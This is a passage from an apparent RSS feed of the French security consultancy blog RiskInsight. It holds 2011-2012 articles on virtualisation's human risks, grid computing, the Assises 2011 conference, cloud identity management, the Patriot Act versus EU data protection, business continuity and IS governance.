<p>Si les risques les plus courants de la virtualisation ne proviennent pas de la technique elle-même, ils se situent plutôt dans <strong>la gestion de ces nouvelles technologies</strong>. La virtualisation introduit dans le SI de nouveaux composants (hyperviseur, consoles…), de nouvelles notions d&rsquo;infrastructure (réseau virtuel…) et les principaux risques de la virtualisation sont le plus souvent issus d&rsquo;un défaut d&rsquo;encadrement liés à ces nouveautés :</p>
<ul>
<li><strong>Mauvais usage des consoles d’administration</strong>, avec des impacts immédiats « effet boule de neige » en cas de mauvaise configuration : arrêt multiple d&rsquo;instances, activation de fonctions de décloisonnement&#8230;</li>
<li><strong>Mauvaises pratiques de gestion de la plate-forme de virtualisation</strong>, notamment sur les aspects de gestion des inventaires et de capacity planning qui doivent être redéfinis.</li>
<li><strong>Défaut de séparation des tâches entre les équipes système et réseau</strong>, avec tous les risques d’erreur, voire de malveillance, dus à la concentration de ces responsabilités.</li>
</ul>
<p><a href="http://www.solucominsight.fr/2012/02/la-virtualisation-ne-virtualise-pas-les-risques-humains/image-virtualisation-solucominsight2/" rel="attachment wp-att-1479"><img loading="lazy" decoding="async" class="aligncenter size-medium wp-image-1479" title="Image virtualisation SolucomINSIGHT2" src="http://www.solucominsight.fr/wp-content/uploads/2012/02/Image-virtualisation-SolucomINSIGHT2-402x191.jpg" alt="" width="402" height="191" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2012/02/Image-virtualisation-SolucomINSIGHT2-402x191.jpg 402w, https://www.riskinsight-wavestone.com/wp-content/uploads/2012/02/Image-virtualisation-SolucomINSIGHT2-71x34.jpg 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2012/02/Image-virtualisation-SolucomINSIGHT2.jpg 1537w" sizes="auto, (max-width: 402px) 100vw, 402px" /></a></p>
<p>Les <strong>risques « humains »</strong> (erreur, malveillance, absence de séparation des responsabilités) prédominent donc sur des risques « technologiques » relativement moins probables et pouvant être limités grâce à des recommandations classiques.</p>
<p><strong>Un projet de sécurisation de la virtualisation, c’est donc bien entendu un projet d’intégration des nouvelles technologies dans la gouvernance opérationnelle de la sécurité pour traiter les risques techniques liés à son utilisation… Mais aussi et avant tout un projet de réflexion sur les rôles, les responsabilités et les compétences de ses administrateurs, afin de traiter les principaux risques de la virtualisation, à savoir les risques humains ! </strong></p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2012/02/la-virtualisation-ne-virtualise-pas-les-risques-humains/">La virtualisation ne virtualise pas les risques humains !</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Quel avenir pour le grid computing ?</title>
		<link>https://www.riskinsight-wavestone.com/2011/10/quel-avenir-pour-le-grid-computing/</link>
		
		<dc:creator><![CDATA[Lise Gasnier]]></dc:creator>
		<pubDate>Wed, 19 Oct 2011 15:07:48 +0000</pubDate>
				<category><![CDATA[Métiers - Energie]]></category>
		<category><![CDATA[Métiers - Stratégie & projets IT]]></category>
		<category><![CDATA[architecture Si]]></category>
		<category><![CDATA[Big Data]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[grid computing]]></category>
		<category><![CDATA[High performance computing]]></category>
		<guid isPermaLink="false">http://www.solucominsight.fr/?p=804</guid>

					<description><![CDATA[<p>Depuis le début des années 2000, les grilles de calcul ont rencontré un succès certain dans le monde scientifique, ainsi que dans certains secteurs de l’industrie et de la finance. Au-delà de ces domaines, l&#8217;usage de ces grilles est peu...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2011/10/quel-avenir-pour-le-grid-computing/">Quel avenir pour le grid computing ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><em>Depuis le début des années 2000, les grilles de calcul ont rencontré un succès certain dans le monde scientifique, ainsi que dans certains secteurs de l’industrie et de la finance. Au-delà de ces domaines, l&rsquo;usage de ces grilles est peu répandu.</em></p>
<p><em>Le 12 octobre dernier, IBM a annoncé le rachat d’un acteur majeur du marché du grid computing : Platform Computing. A cette occasion, nous revenons sur les principes, apports et défis de ce type de technologies peu connu.</em></p>
<p><strong>1.     </strong><strong>Qu’est-ce que le <em>grid computing</em> ?</strong></p>
<p>Le <em>grid computing </em>consiste à mettre en commun des ressources logicielles et matérielles distribuées (ensemble que l’on appelle la « grille ») afin de fournir une puissance de calcul importante. La charge de travail est divisée en sous-tâches qui sont traitées en parallèle par les ressources de la grille, les résultats étant ensuite agrégés dans un résultat global rendu à l’utilisateur.</p>
<p>En anglais, l’emprunt du mot « grid » à l’expression « electric power grid » qui désigne le réseau électrique, traduit bien les promesses du concept : l’utilisateur se branche à la grille qui pourvoit à son besoin. Peu lui importe la complexité du système, l’hétérogénéité ou la distribution des composants, masqués par l’interface d’accès.</p>
<p>Des projets emblématiques donnent le ton, en matière de gigantisme :</p>
<ul>
<li>SETI@HOME se présente comme « une expérience scientifique qui utilise des ordinateurs reliés à internet pour la recherche d&rsquo;une intelligence extraterrestre (SETI) » ; elle tire sa puissance de son « ouverture » aux ordinateurs des internautes volontaires ;</li>
<li>La grille du LHC, l’accélérateur de particules du <a href="http://www.cern.ch/">CERN</a>,  relie en mode « fermé », plusieurs dizaines de milliers de machines, situées sur trois continents, pour analyser des données.</li>
</ul>
<p>La puissance des ordinateurs a beau croître, la « gourmandise » de tels projets scientifiques, atteint des niveaux qui justifient ce modèle d’architecture. Dans le sillage des initiatives académiques, l’industrie et le secteur bancaire s’en sont emparés pour résoudre leurs problèmes complexes : valorisation et analyse de risque pour la finance, détection de gisements pour le pétrole, simulation et analyse de crash pour l’automobile. Aujourd’hui, les grilles intéressent les médias, les jeux en ligne, les fournisseurs internet…</p>
<p><strong>2.     </strong><strong>Quels bénéfices attendre du grid computing ?</strong></p>
<p>Le <em>grid computing</em> peut apporter beaucoup aux secteurs tant privés que publics pour les projets qui requièrent une quantité importante de puissance de traitement dans une période de temps restreinte.</p>
<p>Les bénéfices attendus d’une grille sont :</p>
<ul>
<li>l’amélioration des performances tout en limitant les coûts,</li>
<li>l’augmentation de la flexibilité d’une infrastructure pour absorber les augmentations d’échelle,</li>
<li>la haute disponibilité de cette infrastructure faces aux pics de charge.</li>
</ul>
<p>Les vertus « informatiques » du <em>grid computing </em>se transforment en atouts « métiers » : réduire les temps de calculs, c’est éviter les retards ou gagner du temps pour accroître la compétitivité et/ou pour améliorer ses processus.</p>
<p>Les <em>middlewares</em> « commerciaux » (citons pour l’exemple ceux de <a href="http://www.platform.com/">Platform</a> Computing, <a href="http://www.datasynapse.com/">Tibco Datasynapse</a>, <a href="http://www.gridgain.com/">GridGain</a> en <em>open source</em>) ont bien saisi ces enjeux. Développés à la suite des grilles académiques par transferts technologiques, ils tirent profit de ces besoins en proposant des solutions sur étagères et leur expertise.</p>
<p>Certes, ils évoluent sur un marché de niche, celui  constitué des clients historiques (banques, industries du pétrole, de l’automobile etc.). Mais avec la croissance exponentielle des volumes d’information, qu’il s’agisse d’événements (CEP) ou de données (<em>Big Data</em>), et la nécessité de les exploiter, le positionnement du <em>grid computing</em> pourrait bien se renforcer.</p>
<p><strong>3.     </strong><strong>Quels sont les défis à relever ?</strong></p>
<p>Le concept de <em>grid computing, </em>ainsi que les produits du marché, sont arrivés à maturité au cours de la dernière décennie. Pourtant, il reste encore quelques barrières à franchir pour assister à une démocratisation de cette approche :</p>
<ul>
<li><strong>L’expertise et le support des grilles informatiques ont un coût</strong> : il faut des techniciens qualifiés pour passer la barrière technologique des produits, ou développer/maintenir une grille « maison », mais aussi « gridifier », c’est-à-dire adapter ou développer des applications pour une exécution sur la grille. A ces coûts s’ajoutent ceux des problématiques connexes tels que le stockage ou le transfert des données.</li>
<li><strong>De plus, l’infrastructure peut nécessiter un investissement dédié.</strong>Chaque entreprise dispose généralement d’un ensemble conséquent d’ordinateurs connectés en réseau mais l’usage en grille de ces ressources existantes n’est pas évident :
<ul>
<li>La tendance à la virtualisation a progressivement optimisé l’usage des ressources serveurs qui sont moins sous-exploités qu’il y a une dizaine d’années.</li>
<li>Les préoccupations énergétiques interrogent sur l’intérêt, en entreprise, du modèle des grilles fondées sur des parcs d’ordinateurs peu puissants.</li>
</ul>
</li>
</ul>
<p>Pour autant, le <em>grid computing</em> n’est pas nécessairement l’apanage des grandes structures. Internet autorise le partage de ressources avec des partenaires extérieurs : des PME, des écoles ou des hôpitaux  peuvent se fédérer pour bâtir des grilles qui leur sont inaccessibles, seuls.</p>
<ul>
<li>Les grilles de calcul imposent un modèle d’architecture bien spécifique au sein du SI. De part leur caractère intrusif, elles exigent de trouver des solutions ou des compromis notamment en matière de sécurité mais également de dépasser les aprioris quant aux partages des ressources.</li>
</ul>
<p>Pour autant, le plus gros des défis, pour les acteurs du marché, sera celui du marketing. Le <em>grid computing</em> doit aujourd’hui savoir se faire entendre face à des concepts phagocytaires car, quand il est question de « <em>computing</em> », le « <em>cloud</em> » vient brouiller les pistes.</p>
<p>Pour l’heure, si l’entrée sur le marché d’IBM ne résout pas ce problème d’image, il confirme en revanche l’intérêt du modèle de « grille » et préfigure une tendance, celle de l’intégration. L’avenir du grid computing est, sans doute, au cœur, mais, dans l’ombre du « cloud ».</p>
<p>Pour lire plus d&rsquo;articles sur le secteur de l&rsquo;énergie, <a href="http://www.energystream-solucom.fr/" target="_blank">cliquez ici</a>.</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2011/10/quel-avenir-pour-le-grid-computing/">Quel avenir pour le grid computing ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Trois questions à Gérôme Billois sur les Assises 2011</title>
		<link>https://www.riskinsight-wavestone.com/2011/10/bilan-des-assises-2011/</link>
		
		<dc:creator><![CDATA[SolucomINSIGHT]]></dc:creator>
		<pubDate>Wed, 12 Oct 2011 08:19:05 +0000</pubDate>
				<category><![CDATA[Cloud & Next-Gen IT Security]]></category>
		<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Assises]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[Cloud security]]></category>
		<category><![CDATA[Cybercriminalité]]></category>
		<guid isPermaLink="false">http://www.solucominsight.fr/?p=789</guid>

					<description><![CDATA[<p>Les Assises de la sécurité et des systèmes d’information viennent de se tenir du 5 au 8 octobre à Monaco. Quel est votre retour sur cet événement ? Une fois de plus les Assises sont un succès, un succès à la...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2011/10/bilan-des-assises-2011/">Trois questions à Gérôme Billois sur les Assises 2011</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><strong>Les Assises de la sécurité et des systèmes d’information viennent de se tenir du 5 au 8 octobre à Monaco. Quel est votre retour sur cet événement ?</strong></p>
<p>Une fois de plus les Assises sont un succès, un succès à la fois grâce à une organisation de grande qualité mais aussi du fait de la présence de l’ensemble de la communauté française. RSSI, responsables des risques, DSI, éditeurs, constructeurs et cabinets de conseil, tous étaient là dans une optique de partage et d’échange toujours aussi fructueuse.</p>
<p><strong>Quels sont les sujets d’actualités et les nouveautés rencontrées ?</strong></p>
<p>Les sujets ont tellement été diversifiés qu’il est quasiment impossible de tous les citer. Si je devais le résumer les 3 mots clés les plus rencontrés, je dirais : cloud, consumersation et cybercriminalité. Ils ont été largement débattus et ont fait l’objet de nombreuses annonces innovantes. A l’inverse, je noterais une  plus faible représentation des sujets attenant à la sécurité applicative, pourtant au cœur de la protection aujourd’hui. Enfin, des sujets plus atypiques et prospectifs comme l’IPv6, ont fait leur apparition.</p>
<p>Finalement la gestion de risques et l’évolution du rôle du RSSI ont, une fois de plus, été l’objet de nombreuses discussions dans plusieurs ateliers, dont celui animé par Solucom. Le débat s’est élargi, touchant alors à des problématiques hors « sécurité », avec notamment une intervention de premier plan de Luc Ferry sur la multiplication des peurs dans notre société. J’en retiendrai que la peur ne doit pas être le premier élément de nos réflexions et que la gestion du risque ne doit pas être un frein au développement ou à l’innovation !</p>
<p><strong>L’ANSSI a animé une plénière pour alerter la communauté et lui demander de revenir aux fondamentaux de la sécurité, quelle est votre analyse ? </strong></p>
<p>Je pense qu’aujourd’hui la communauté sécurité connaît bien ces fondamentaux (gestion d’identité, correctifs, antivirus, durcissement…), mais elle est confrontée depuis plus d’une dizaine d’année à la difficulté de les faire appliquer. Les équipes techniques et les métiers rechignent, les directions ne comprennent pas.</p>
<p>Cet état de fait a amené la communauté à s’orienter d’une part autour de la gestion des risques, afin de  concrétiser et d’expliciter en termes « métier » les impacts potentiels, mais aussi d’autre part dans la publication de nombreuses normes ou réglementations pour aider ou « forcer » l’application de ces mesures. Pourtant, cela n’a marché qu’un temps et la plupart de ces initiatives se sont transformées en sécurité « cache sexe » comme le disait Patrick Pailloux. Cela est un vrai drame car ces démarches pourtant de qualité sont trop souvent dévoyées !</p>
<p>A mon sens, aujourd’hui, la communauté sécurité manque de leviers pour convaincre les directions et les métiers. Elle manque également de support managérial pour réellement sanctionner et faire évoluer des pratiques déviantes souvent rencontrées. Les récents incidents médiatiques sont une aide mais la logique du « cela n’arrive qu’aux autres » est encore trop répandue</p>
<p>L’ANSSI, grâce à son message « back to basics », joue un rôle de premier plan. Mais elle pourrait aller plus loin en faisant part régulièrement de leur « thermomètre » du risque tel qu’évoqué durant la plénière afin de faciliter la sensibilisation des donneurs d’ordre.</p>
<p>Il faut arrêter de minimiser l’exposition de la France aux menaces cybercriminelles. L’illusion de sécurité est bien trop répandue aujourd’hui et j’espère que  les messages forts de la plénière aideront à changer cette situation.</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2011/10/bilan-des-assises-2011/">Trois questions à Gérôme Billois sur les Assises 2011</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Cloud computing : maîtriser ses coûts grâce à une bonne gestion des identités</title>
		<link>https://www.riskinsight-wavestone.com/2011/09/cloud-computing-maitriser-ses-couts-grace-a-une-bonne-gestion-des-identites/</link>
		
		<dc:creator><![CDATA[Emmanuel Cosperec]]></dc:creator>
		<pubDate>Mon, 12 Sep 2011 15:08:16 +0000</pubDate>
				<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Digital Identity]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[IAM]]></category>
		<category><![CDATA[identité]]></category>
		<category><![CDATA[identity & access management]]></category>
		<category><![CDATA[protection des données]]></category>
		<guid isPermaLink="false">http://www.solucominsight.fr/?p=642</guid>

					<description><![CDATA[<p>Attrayants, simples d’usage et facilement déployables, les services cloud se sont rapidement répandus au sein des grandes entreprises. Leurs modèles de coûts ont aussi séduit de nombreuses directions générales : basés la plupart du temps sur le nombre d&#8217;utilisateurs actifs, ils...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2011/09/cloud-computing-maitriser-ses-couts-grace-a-une-bonne-gestion-des-identites/">Cloud computing : maîtriser ses coûts grâce à une bonne gestion des identités</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Attrayants, simples d’usage et facilement déployables, les services <em>cloud</em> se sont rapidement répandus au sein des grandes entreprises. Leurs modèles de coûts ont aussi séduit de nombreuses directions générales : basés la plupart du temps sur le nombre d&rsquo;utilisateurs actifs, ils semblent simples, efficaces et prédictibles.</p>
<p><strong>La difficulté de la prédictibilité des coûts dans le cloud</strong></p>
<p>Le modèle du <em>cloud</em> nécessite une attention forte pour ne pas perdre au bout de quelques temps les gains économiques escomptés, voire éviter une réelle dérive des coûts. Dans le <em>cloud</em>, comme au sein du SI historique, une gestion fiable des identités est ainsi essentielle pour garantir durablement la maîtrise du nombre d’accédants à ces services.</p>
<p>Bien évidemment, elle vise également à renforcer la protection de l’accès aux informations qui y sont stockées. Elle y est même encore plus indispensable, vu l’absence de garde-fous traditionnellement rencontrés, comme par exemple la « porte d’entrée » <em>Active Directory</em> ou le contrôle d’accès physique.</p>
<p><strong>Gérer les identités dans le <em>cloud</em> : quelles stratégies gagnantes ?</strong></p>
<p>Comment le faire concrètement ? Plusieurs solutions sont envisageables :</p>
<p>&#8211;       <strong>Gestion manuelle sur le site du service <em>cloud</em> par les équipes de l’entreprise.</strong> C’est certes efficace pour lancer rapidement des initiatives <em>cloud</em>, mais il faut prévoir de rencontrer, tout aussi rapidement, toutes les limites bien connues de la gestion manuelle : écart, difficultés de maintien, complexité des revues…</p>
<p>&#8211;       <strong>Gestion automatisée via un service de provisioning/deprovisioning avec des contrôles a priori (validations) et/ou a posteriori (contrôles et recertifications)</strong> : l’accès aux services <em>cloud</em> piloté par les processus et les outils IAM de l’entreprise. Mêmes solutions que dans le SI historique… et mêmes vigilances et bonnes pratiques pour éviter toute désillusion !</p>
<p>&#8211;       <strong>Gestion automatisée via un service de fédération d’identités</strong> : certainement aujourd’hui la solution à privilégier quand cela est possible, puisqu’elle apporte des réponses satisfaisantes aussi bien sur les problématiques de gestion au quotidien qu’en termes d’expérience utilisateur. Après des années de balbutiements où les entreprises n’allaient quasiment jamais plus loin qu’un prototype, les derniers dix-huit mois marquent le réel envol de la fédération avec des réalisations significatives.</p>
<p>&#8211;       <strong>Gestion automatisée et fédérée par un tiers de confiance</strong>, jouant le rôle d’intermédiaire entre l’entreprise et les différents offreurs de services <em>cloud</em>. Des acteurs commencent à se positionner sur ce sujet, mais la classique question de la confiance se pose !</p>
<p><strong>Le <em>cloud</em> : un booster pour les projets IAM</strong></p>
<p>Sujets à traiter, bon sens et bonnes pratiques, priorisation et angles d’attaque, risques et écueils à éviter : la gestion des identités dans le <em>cloud</em> doit relever les mêmes challenges que dans le SI historique.</p>
<p>Et si le <em>cloud</em> était un levier formidable pour d’une part simplifier et fiabiliser les processus et outillages IAM actuels, et d’autre part faire décoller l’usage de nouveaux services IAM de type reporting et recertification ?</p>
<div>
<hr align="left" size="1" width="33%" />
<div>
<div>
<p> <a href="#_msoanchor_1"><br />
</a></p>
</div>
</div>
</div>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2011/09/cloud-computing-maitriser-ses-couts-grace-a-une-bonne-gestion-des-identites/">Cloud computing : maîtriser ses coûts grâce à une bonne gestion des identités</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>La guerre des réglementations aura-t-elle raison du cloud computing?</title>
		<link>https://www.riskinsight-wavestone.com/2011/08/cloud-computing-la-guerre-des-reglementations-aura-t-elle-raison/</link>
		
		<dc:creator><![CDATA[Marianne Benichou]]></dc:creator>
		<pubDate>Wed, 03 Aug 2011 12:33:12 +0000</pubDate>
				<category><![CDATA[Cloud & Next-Gen IT Security]]></category>
		<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[Cloud security]]></category>
		<category><![CDATA[protection des données]]></category>
		<category><![CDATA[Règlementation]]></category>
		<guid isPermaLink="false">http://www.solucominsight.fr/?p=534</guid>

					<description><![CDATA[<p>[Article rédigé en collaboration avec Gérôme Billois] Une nouvelle bataille juridique s’ouvre entre les États-Unis et l’Europe. En jeu cette fois-ci, le Cloud Computing. L’’affiche ? USA Patriot Act Vs. Directive Européenne de protection des données à caractère personnel. D’un côté,...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2011/08/cloud-computing-la-guerre-des-reglementations-aura-t-elle-raison/">La guerre des réglementations aura-t-elle raison du cloud computing?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><em>[Article rédigé en collaboration avec Gérôme Billois]</em></p>
<p>Une nouvelle bataille juridique s’ouvre entre les États-Unis et l’Europe. En jeu cette fois-ci, le Cloud Computing. L’’affiche ? USA Patriot Act Vs. Directive Européenne de protection des données à caractère personnel.</p>
<p>D’un côté, l’USA Patriot Act. Véritable épouvantail de l’externalisation et fer de lance de la lutte antiterroriste US, il autorise les écoutes et la capture de données par les autorités américaines, avec un encadrement judiciaire permettant de le faire à l’insu de leur propriétaire… Il constitue l’argument le plus précieux des opposants de l’hébergement de données aux Etats-Unis.</p>
<p>De l’autre, la Directive européenne pour la protection des données à caractère personnel. Mère européenne de la Loi Informatique et Libertés française, elle encadre fortement le traitement de données en dehors de frontières de l’Union et, plus généralement, leur accès non légitime et non autorisé par le responsable de traitement. Bien plus, elle le rend pénalement responsable de tout accès tiers non signalé aux propriétaires des données.</p>
<p>Au centre, Microsoft. Le géant de Redmond consent des efforts importants pour être en conformité avec les réglementations sur les données à caractère personnel. En particulier, leur adhésion aux principes du<a href="http://www.cnil.fr/vos-responsabilites/le-transfert-de-donnees-a-letranger/safe-harbor/" target="_blank" rel="noopener noreferrer"> Safe Harbor</a> , qui, en dépit de certaines limites, constitue une garantie jugée suffisante par l’Europe pour que soit autorisé le transfert de données à caractère personnel vers une entreprise américaine. D’autre part la mise en place d’un Cloud européen, aux serveurs dédiés et localisés strictement au sein des frontières de l’Union ensuite, offre une solution simple pour la conformité.</p>
<p>A l’origine de la bataille, une conférence dédiée au lancement d’Office 365. Le directeur Royaume-Uni de Microsoft a alors reconnu tout haut ce que bon nombre de spécialistes du secteur murmuraient déjà : son siège social étant domicilié aux Etats-Unis, Microsoft est soumis au droit national… et doit donc appliquer l’USA Patriot Act y compris sur le sol européen.</p>
<p>Et ceci est vrai pour l’ensemble des fournisseurs américains de services de Cloud computing ! Ils pourraient ainsi être amenés à communiquer aux autorités américaines des données de leurs clients européens, en dehors de tout cadre légal national ou communautaire.</p>
<p>Cette transparence soudaine signe-t-elle le début de la fin du Cloud computing <em>made in</em> USA ? ou s’agit-il d’une opportunité de croissance inespérée pour les fournisseurs européens ? Doit-on s’attendre à une migration massive des premiers vers les seconds ?</p>
<p>Ce qui est vécu comme une ingérence américaine sur le terrain législatif communautaire est aujourd’hui examiné par la Commission Européenne, qui s’est saisie du sujet.</p>
<p>Sans préjuger en rien des conclusions des débats d’ores et déjà très animés sur le sujet, cette bataille mérite d’être suivie avec attention.  Et permet de rappeler l’importance d’une analyse de risques, y compris juridiques, avant tout recours à un fournisseur externe&#8230;</p>
<p>&nbsp;</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2011/08/cloud-computing-la-guerre-des-reglementations-aura-t-elle-raison/">La guerre des réglementations aura-t-elle raison du cloud computing?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>La continuité d’activité : de nouveaux défis pour 2011</title>
		<link>https://www.riskinsight-wavestone.com/2011/03/la-continuite-dactivite-de-nouveaux-defis-pour-2011/</link>
		
		<dc:creator><![CDATA[Florian Carrière]]></dc:creator>
		<pubDate>Tue, 01 Mar 2011 15:02:11 +0000</pubDate>
				<category><![CDATA[Cyberrisk Management & Strategy]]></category>
		<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[continuité d'activité]]></category>
		<category><![CDATA[PCA]]></category>
		<category><![CDATA[PCI]]></category>
		<category><![CDATA[Risk management]]></category>
		<guid isPermaLink="false">http://www.solucominsight.fr/?p=118</guid>

					<description><![CDATA[<p>(Tribune rédigée en collaboration avec William Revah et Amal Boutayeb) Si la continuité d’activité fait partie depuis longtemps des préoccupations de bon nombre d’entreprises, elle demeure néanmoins un sujet d’actualité pour 2011. Même sur le volet informatique, souvent le plus...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2011/03/la-continuite-dactivite-de-nouveaux-defis-pour-2011/">La continuité d’activité : de nouveaux défis pour 2011</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><strong><em>(Tribune rédigée en collaboration avec William Revah et Amal Boutayeb)</em></strong></p>
<p>Si la continuité d’activité fait partie depuis longtemps des préoccupations de bon nombre d’entreprises, elle demeure néanmoins un sujet d’actualité pour 2011. Même sur le volet informatique, souvent le plus mûr, des évolutions sont à prévoir. Quasiment tous les grands comptes disposent aujourd’hui d’un plan de continuité informatique (PCI) performant, bâti à l’initiative des DSI pour répondre à la dépendance croissante des organisations au SI. Mais cela n’est plus suffisant.</p>
<h2>Un PCI soumis aux innovations et aux nouvelles menaces</h2>
<p>Le PCI se doit de suivre l’évolution rapide de la production informatique, pour en profiter au mieux. Parmi les innovations marquantes figurent la virtualisation et le cloud computing. La première peut faciliter grandement les opérations de bascule et de redémarrage, parfois même « à chaud » et sans interruption de service. Le second, par la révolution qu’il impose au SI, nécessite la révision intégrale du dispositif de secours.</p>
<p>Au-delà, le cloud computing peut également constituer une solution de secours en soi, alternative aux sites de secours classiques. Mais comme pour la production, il induit des risques pour la sécurité des données, et est souvent encore insuffisamment rassurant quant à la capacité réelle de reprise qu’il apporte.</p>
<p>Parallèlement, les exigences envers les PCI évoluent : en effet, de nouvelles menaces apparaissent régulièrement et ne sont pas couvertes par les plans actuels. La plus prégnante aujourd’hui est sans doute le risque de cyber attaque, choc « extrême » à propos duquel la réflexion s’engage à peine.</p>
<h2>Faire mûrir le volet opérationnel</h2>
<p>La continuité d’activité ne se limite pas à celle de l’informatique : les réflexions sur la continuité des opérations progressent également. Là encore, les chocs extrêmes constituent une limite forte aux plans actuels. La plupart des organisations savent faire face à l’indisponibilité d’un bâtiment, mais restent souvent démunies face à un sinistre de plus grande ampleur, type crue de Seine. Le traitement de cette problématique sera un des enjeux des années à venir.</p>
<p>Les prestations de services externalisées constituent également un sujet d’attention, compte tenu de leur importance majeure pour la plupart des organisations : comment identifier les prestations réellement clés, quelles exigences fixer aux prestataires, et comment s’assurer du respect des engagements ?</p>
<p>Enfin, la capacité à maintenir dans le temps les plans de continuité d’activité (PCA) est une problématique majeure : adapter en permanence le plan aux évolutions rapides des organisations et du SI nécessite une méthodologie rigoureuse pour capter l’évolution des besoins et des solutions, et vérifier en permanence leur adéquation.</p>
<p>Le déploiement progressif d’une norme ISO sur le sujet en serait-il un levier ? Largement issue de la norme BS 25999, elle adapte la notion de système de management aux processus de continuité d’activité. Les responsables PCA devront bientôt choisir entre se contenter de suivre les bonnes pratiques, ou aller jusqu’à l’alignement voire la certification.</p>
<h2>Ne pas oublier les fondamentaux</h2>
<p>Bien entendu, ces sujets d’actualité ne doivent par occulter les problématiques classiques de la continuité. Du bilan d’impact sur l’activité au maintien en condition opérationnelle en passant par le choix de la stratégie, le PCA doit rester un processus vivant, sous peine de disposer d’un plan inutile le jour J. Le maintien de cet effort dans un contexte budgétaire contraint est capital. Outre qu’il permettra d’assurer la continuité de l’activité au besoin, ce souci constant offre  aux organisations l’opportunité de progresser sur un sujet de plus en plus sensible, la connaissance et la maîtrise de leurs risques. A ce titre, le PCA est bien plus qu’une simple assurance, et doit rester un sujet d’attention majeur pour les années à venir.</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2011/03/la-continuite-dactivite-de-nouveaux-defis-pour-2011/">La continuité d’activité : de nouveaux défis pour 2011</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Des évolutions structurantes pour la gouvernance des SI</title>
		<link>https://www.riskinsight-wavestone.com/2011/02/des-evolutions-structurantes-pour-la-gouvernance-des-si/</link>
		
		<dc:creator><![CDATA[GEneviEveLardon]]></dc:creator>
		<pubDate>Fri, 25 Feb 2011 16:04:47 +0000</pubDate>
				<category><![CDATA[Métiers - Stratégie & projets IT]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[gouvernance des SI]]></category>
		<category><![CDATA[réseaux sociaux]]></category>
		<guid isPermaLink="false">http://www.solucominsight.fr/?p=86</guid>

					<description><![CDATA[<p>Il est marquant de voir combien la période qui s’ouvre s’annonce clé pour la gouvernance des SI. Rarement autant d’évolutions structurantes se seront combinées entraînant un impact en profondeur de l’organisation et de la gouvernance des DSI. Des évolutions technologiques...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2011/02/des-evolutions-structurantes-pour-la-gouvernance-des-si/">Des évolutions structurantes pour la gouvernance des SI</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Il est marquant de voir combien la période qui s’ouvre s’annonce clé pour la gouvernance des SI. Rarement autant d’évolutions structurantes se seront combinées entraînant un impact en profondeur de l’organisation et de la gouvernance des DSI.</p>
<h2>Des évolutions technologiques</h2>
<p>2010 a été marquée par de fortes évolutions technologiques, et en premier lieu par l’innovation apportée par le cloud. Au-delà des apports fonctionnels et des évolutions techniques, l’approche cloud provient surtout de la diffusion d&rsquo;un nouveau modèle économique construit autour de la notion de service informatique identifiable, qualifiable et dénombrable pour les utilisateurs finaux. L’approche cloud entraîne pour la DSI des questions d’intégration, de sécurisation et de gouvernance. Intégration des différentes briques de services entre elles (y compris les stratégies de sourcing sous-jacentes), maintien d’un niveau de sécurité acceptable pour les clients de la DSI au regard de leur analyse de risque et remises en cause de la gouvernance et des organisations par un renforcement des capacités des DSI à piloter et orchestrer des services externes.</p>
<h2>Des évolutions d’usage</h2>
